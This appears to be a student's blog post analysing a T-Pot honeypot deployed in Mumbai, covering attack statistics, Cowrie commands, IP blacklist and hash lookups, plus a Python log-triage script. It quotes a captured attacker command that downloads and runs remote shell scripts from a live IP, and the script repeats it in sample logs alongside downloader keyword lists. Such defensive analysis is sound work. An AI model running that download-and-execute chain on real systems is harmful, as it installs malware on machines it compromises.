Mumbai Honeypot Threat Analysis

Jessica Vazquez
9 min read · May 24, 2022


Table of Contents

  • Introduction
  • T-Pot Dashboard
  • Cowrie
  • Cowrie — Blacklist Check
  • Cowrie — Commands
  • Cowrie — Hash Analysis
  • Debrief

Introduction

The threat analysis in this blog occurred over five days. I created and generated this T-Pot using Amazon Web Services. If you would like to create your T-Pot click on this link to learn more.

T-Pot is a multi-honeypot platform. It uses multiple well-known honeypots and IDS to analyze and gather data from attacks. For this blog post, I will be using the Kibana dashboard to analyze the data gathered from my honeypots. The Kibana T-Pot dashboard provides up-to-date data from all of the honeypots that make up T-Pot. We can also select to see individual honeypots or filter out specific data from our dashboard. We will start by examining the T-Pot Dashboard first before moving on to the Cowrie honeypot.

T-Pot Dashboard

On the T-Pot dashboard, we can see all of the statistical graphs and information the honeypots are gathering from each attack. We can see that the Cowrie honeypot has had the most hits. The port used for most of the attacks has been port 445 (SMB), followed by port 22 (SSH).

T-Pot Dashboard

In the other blocks, we can see the top operating systems used for these attacks, top ports by country, and the types of attacks being conducted with privilege escalation making up a large portion of the attacks.

T-Pot Dashboard

Let’s take a look at some of the commands being used on the honeypots. The first one

cd /data/local/tmp/; busybox wget http://194.31.98.205/w.sh; sh w.sh; curl http://194.31.98.205/c.sh; sh c.sh

looks interesting, so let us begin deciphering what it all means. The cd /data/local/tmp/ command changes into the “/data/local/tmp/” directory. A “tmp” directory stores temporary files, which are cleared or overwritten regularly. The next command is busybox wget http://194.31.98.205/w.sh; sh w.sh. BusyBox is a single binary that bundles stripped-down versions of common Unix utilities, so busybox wget is a minimal wget with fewer options than the full tool. In this command, busybox wget retrieves the file w.sh over HTTP, and sh w.sh then executes the downloaded script. The curl command that follows does the same with c.sh.

So now that we know that this attack is meant to download something from the web let’s see if this link is malicious. I used the site https://urlscan.io/ to look up the URL http://194.31.98.205/. Urlscan.io is a great website to scan and analyze websites that look suspicious. On the results page, we can see that this URL has been flagged as malicious. We can also see the location of the IP address and the system it belongs to.

URLscan.io Summary

Let’s move on and look at another block in the T-Pot dashboard. At the bottom of the page, we can see the top 10 signature attacks on the honeypots. At the top with the most counts is

ET EXPLOIT [PTsecurity] DoublePulsar Backdoor installation communication

The DoublePulsar full kernel payload is a backdoor that hides in a system, avoiding detection by anti-malware and other detection systems. Through that backdoor, it injects malicious code into the system to take control of it. It has also been found to wipe memory as a form of evasion; however, parts of the code remain on the victim’s system (Arghire, 2017). The NSA’s FuzzBunch software, an exploitation framework similar to Metasploit, uses this payload to exploit SMB and RDP.

T-Pot Suricata Alert — Top 10

Lastly, at the bottom of the T-Pot dashboard are the usernames and passwords the threat actors used to try and log into the honeypots. I found these blocks to be incredibly important because it goes to show us how important password complexity is in network security.

T-Pot Dashboard

Cowrie

Now let us take a look at the Cowrie dashboard. Cowrie is a honeypot designed to emulate SSH and Telnet services. When an attacker brute-forces credentials or logs in via SSH, Cowrie logs those interactions, giving us insight into how the attack was conducted.

In the first three days, there have been 45,083 attacks on the Cowrie honeypot.

Cowrie Attack Map

Japan made up 28% of those attacks, the United States made up 22%, followed by China with 18%. On the fifth day, the number of attacks from these three countries was almost equal. The United States took the top spot followed by Japan and China.

Cowrie Attacks by Country

Cowrie — Blacklist check

Looking through the Cowrie dashboard, there is a list of the top 10 IP addresses with the most attacks. Ranked number one is the source IP 43.154.33.84. Let’s investigate and find out where this source IP is coming from. First, let us check https://www.ipvoid.com/ to see if this IP is on a blacklist. IPVoid is a great site to research additional details about an IP address. IPVoid was created as an IP blacklist checker; however, over the years more services and tools have been added to provide greater detail about IP addresses. Let’s see whether this IP is on a blacklist by entering the IP address in the IP Blacklist Check box.

IPVoid Blacklist Check

On the results page, we get where the source IP is coming from, the internet service provider, and of course the blacklist. From the list, we know this IP is associated with malicious and spamming activities.

IPVoid Results Page
IPVoid Blocklist Report

If we click on the first link, we can see which servers the IP address 43.154.33.84 has attacked. From the list, we can see all of the servers that have blocked that specific IP address and the times and dates these attacks took place.

IPVoid Blocklist Time and Date

We can conclude that 43.154.33.84 is a malicious IP address that should be blocked from our servers because of the information we gathered on IPVoid.

Cowrie — Commands

Now let us take a look at the top 10 commands used on the Cowrie honeypot.

Cowrie Input — Top 10

From the list, we can tell that most of these commands are looking for system information. Let us decipher what the first command means.

cat /proc/cpuinfo | grep model | grep name | wc -l

cat is a Linux command-line tool that displays the contents of a file. The malicious actor wants to see what is inside the “/proc/cpuinfo” file … hmm, I wonder why. If you guessed CPU info, you are correct. The “cpuinfo” file describes the processors the system is running, including the model name, cache size, number of CPUs present, the speed of the processor, flags, and much more.

Image by The Geek Diary via https://www.thegeekdiary.com/proccpuinfo-file-explained/

The command grep is a search tool found on most operating systems. It searches a file (or a directory of files) for a character string and prints each line containing it. In this case, the malicious actor is searching for “model” in the “/proc/cpuinfo” file, which prints every line containing the string “model”; the next grep then keeps only those lines that also contain “name”. The last command, wc, counts the lines, words, and bytes in its input, and the “-l” flag tells it to print only the line count. So let’s put this all together: the user is counting the “model name” lines in “/proc/cpuinfo”, one per logical processor, which from the previous image gives us this result.

Image by The Geek Diary via https://www.thegeekdiary.com/proccpuinfo-file-explained/

The same applies to the next command:

cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

When I ran this command on my Kali Linux, the model name of my processor popped up, which is useful information for an adversary looking for vulnerabilities specific to that processor.

Looking down the list of the top 10 command-line inputs, top is another useful command. It displays the running processes on a Linux machine in real time, along with kernel-managed tasks and a summary of system information.

Image by Bosko Marijan via https://phoenixnap.com/kb/top-command-in-linux

Cowrie — Hash Analysis

Let us move on and take a look at the Cowrie Discover page. In the search bar at the top, I typed in “Pakistan” to filter for the logs containing the word “Pakistan”. Looking through the logs, I found this log that looked interesting. The log contained an MD5 hash. Let us look up this hash to see if it is malicious. I used a malware hash registry to find this out. There are several sites that provide this type of service. I copied the hash, pasted it into the malware hash registry at https://hash.cymru.com/, then clicked submit.

Cowrie Hash
Hash.CYMRU Results Page

Well, from the results it looks like this hash is malicious.

Let us look at another one.

Cowrie Hash

This looks like the attacker was downloading something onto the honeypot because of the wget command. As we know, wget is used to download or retrieve files from a web server. I copied the link http://194.31.98.205/c.sh, pasted it into the URL search bar on virustotal.com, and here is the result.

VirusTotal Results Page

This URL is malicious. In the Details tab, we can find further information such as the source IP, the hashes of the served file, and the content type.

VirusTotal Details Page
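The checks above (the download chain on the T-Pot dashboard, the top attacking IP for the IPVoid blacklist lookup, the breakdown of Cowrie commands into system-information gathering versus payload downloads, and the hashes and URLs submitted to hash.cymru.com and VirusTotal) were all done by reading the Kibana dashboard by hand. The script below is an added example, not code from this post, from T-Pot or from the Cowrie project, that pulls the same items out of Cowrie's raw JSON log so they can be looked up in bulk. It assumes Cowrie's JSON log format (eventid, src_ip, username, password, input, url, shasum); the log lines inside it are constructed samples built around the IP, URLs and commands quoted in this post, not real honeypot data.

```python
"""Cowrie JSON log triage: top source IPs, attempted credentials, command
categories, download URLs and file hashes.
Added example; not code from the post, T-Pot or the Cowrie project.
ASSUMPTION: Cowrie's JSON log format (eventid, src_ip, username, password,
input, url, shasum). SAMPLE_LOG is constructed, not real data."""
import json
import re
from collections import Counter

FAKE_SHA256 = "c0ffee" * 10 + "c0ff"   # constructed 64-hex placeholder hash

# Constructed sample events, one JSON object per line. 43.154.33.84, the URLs
# and the command lines are those quoted in the post; the other IPs are
# documentation ranges and the hash is the placeholder above.
SAMPLE_LOG = r"""
{"eventid":"cowrie.login.failed","src_ip":"43.154.33.84","username":"root","password":"123456","session":"a1","timestamp":"2022-05-20T10:00:00Z"}
{"eventid":"cowrie.login.success","src_ip":"43.154.33.84","username":"root","password":"password","session":"a1","timestamp":"2022-05-20T10:00:05Z"}
{"eventid":"cowrie.command.input","src_ip":"43.154.33.84","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","session":"a1","timestamp":"2022-05-20T10:00:07Z"}
{"eventid":"cowrie.command.input","src_ip":"43.154.33.84","input":"cd /data/local/tmp/; busybox wget http://194.31.98.205/w.sh; sh w.sh; curl http://194.31.98.205/c.sh; sh c.sh","session":"a1","timestamp":"2022-05-20T10:00:09Z"}
{"eventid":"cowrie.session.file_download","src_ip":"43.154.33.84","url":"http://194.31.98.205/c.sh","outfile":"dl/CONSTRUCTED_OUTFILE","shasum":"FAKE_SHA256","session":"a1","timestamp":"2022-05-20T10:00:10Z"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.7","username":"admin","password":"admin","session":"b2","timestamp":"2022-05-20T11:00:00Z"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.7","input":"uname -a; top","session":"b2","timestamp":"2022-05-20T11:00:03Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.9","username":"root","password":"123456","session":"c3","timestamp":"2022-05-20T12:00:00Z"}
""".replace("FAKE_SHA256", FAKE_SHA256)

URL_RE = re.compile(r"https?://[^\s;'\"|&]+")          # stops at shell separators
HASH_RE = re.compile(r"\b[0-9a-fA-F]{64}\b|\b[0-9a-fA-F]{40}\b|\b[0-9a-fA-F]{32}\b")

# Keyword buckets for the two kinds of input the post discusses.
RECON_WORDS = frozenset({"cpuinfo", "meminfo", "uname", "top", "whoami", "lscpu", "nproc", "id"})
DOWNLOAD_WORDS = frozenset({"wget", "curl", "tftp", "ftpget"})


def parse_events(text):
    """Parse one Cowrie JSON event per line; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def classify_command(cmd):
    """Bucket a shell line as download / recon / other."""
    tokens = set(re.split(r"[\s;|&/()]+", cmd))
    if tokens & DOWNLOAD_WORDS:
        return "download"   # fetches and runs a payload (w.sh, c.sh ...)
    if tokens & RECON_WORDS:
        return "recon"      # system-information gathering (cpuinfo, top ...)
    return "other"


def triage(events):
    """Summarise events into the items an analyst would look up next."""
    top_ips = Counter(e["src_ip"] for e in events if "src_ip" in e)
    creds = Counter(
        (e.get("username"), e.get("password"))
        for e in events if e.get("eventid", "").startswith("cowrie.login.")
    )
    commands = [e["input"] for e in events if e.get("eventid") == "cowrie.command.input"]
    urls, hashes = set(), set()
    for e in events:
        for value in e.values():
            if isinstance(value, str):
                urls.update(URL_RE.findall(value))      # for urlscan.io / VirusTotal
                hashes.update(HASH_RE.findall(value))   # for hash.cymru.com
    return {
        "top_ips": top_ips.most_common(3),              # candidates for IPVoid
        "top_credentials": creds.most_common(3),
        "command_categories": dict(Counter(classify_command(c) for c in commands)),
        "urls": sorted(urls),
        "hashes": sorted(h.lower() for h in hashes),
    }


if __name__ == "__main__":
    print(json.dumps(triage(parse_events(SAMPLE_LOG)), indent=2))
```

On a real T-Pot install the same function can be fed the contents of Cowrie's JSON log file instead of SAMPLE_LOG; the URL and hash sets it returns are the values to submit to the lookup services used in this post, and the credential counter reproduces the username/password blocks at the bottom of the dashboard.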

Debrief

The information we gathered on T-Pot gave us insight into how threat actors go about attacking a network. We were able to view real-time attacks as they occurred on the attack map and view the log files in Kibana. The Mumbai location for the T-Pot server received a range of attacks from all over the world. Considering India’s relationship with Pakistan, I did not see many attacks from that nation. There was no particular country that made up most of the attacks on the honeypots; the number of attacks from each nation was spread out almost equally by the end of the fifth day. The Cowrie honeypot experienced the most attacks out of the 20+ honeypots used in this report. The attacks on this honeypot used malicious sites to download malware onto the honeypot. We used various tools to help us investigate suspicious IP addresses and malware hashes throughout our threat analysis.

I hope you found this blog post helpful and informational. Thank you for taking the time to read it. I will be posting more blogs on cybersecurity in the future. Stay tuned and don’t forget to follow if you would like to receive notifications on my next blog post.

References

Arghire, I. (2017, April 24). Hackers are using NSA’s DoublePulsar Backdoor in Attacks. Security Week. https://s1.securityweek.com/hackers-are-using-nsas-doublepulsar-backdoor-attacks


Jessica Vazquez

I am an aspiring cybersecurity analyst and future graduate student at the Illinois Institute of Technology.